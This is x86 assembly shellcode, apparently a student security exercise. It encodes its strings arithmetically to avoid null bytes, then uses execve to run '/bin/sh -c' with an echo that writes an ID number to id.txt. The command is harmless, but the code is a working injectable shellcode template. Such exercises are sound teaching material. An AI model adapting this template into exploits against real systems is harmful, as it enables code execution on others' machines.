global _start
_start:
	add    esp,0xfffffdfc
	mov    eax,0x11111111
	sub    eax,0x11111111

	sub     esp, 4
	mov 	[esp], eax

	;/bin//sh
	mov    eax,0x68732f2f
	push   eax
	mov    ebx,0x6e69622f
	push   ebx
	xor    eax,eax
	xor    ebx,ebx

	;null-terminated string
	lea    ebx, [esp]
	push   eax
	lea    edx, [esp]
	push   eax

	;spaces
	mov    eax,0x31313131
	sub    eax,0x11111111
	push   eax
	xor    eax,eax

	;-c
	mov    eax,0x2222854f
	sub    eax,0x22222222
	push   eax

	lea    esi, [esp]

	mov    eax,0x11111111
	sub    eax,0x11111111
	push   eax

	;>id.txt
	mov    eax,0x8589853f
	sub    eax,0x11111111
	push   eax
	mov    eax,0x757a314f
	sub    eax,0x11111111
	push   eax

	;;put my id 318778081
	;81
	mov    eax,0x31314249
	sub    eax,0x11111111
	push   eax
	;7780
	mov    eax,0x41494848
	sub    eax,0x11111111
	push   eax
	;3187
	mov    eax,0x49424431
	sub    eax,0x11111111
	push   eax
	mov    eax,0x11111111
	sub    eax,0x11111111

	;;echo
	mov    eax,0x5e575254
	add    eax,0x11111111
	push   eax
	mov    eax,0x11111111
	sub    eax,0x11111111

	;;the arguments
	lea    edi,[esp]
	sub     esp, 4
	mov 	[esp], eax
	sub     esp, 4
	mov 	[esp], edi
	sub     esp, 4
	mov 	[esp], esi
	sub     esp, 4
	mov 	[esp], ebx
	lea    ecx,[esp]
	;;sys call execve
	mov    al,0xb
	int    0x80

	;;exit
	mov    eax,0x11111111
	sub    eax,0x11111111
	push   eax
	mov    eax,0x22222222
	sub    eax,0x12222222
	xor    ebx, ebx
	int    0x80



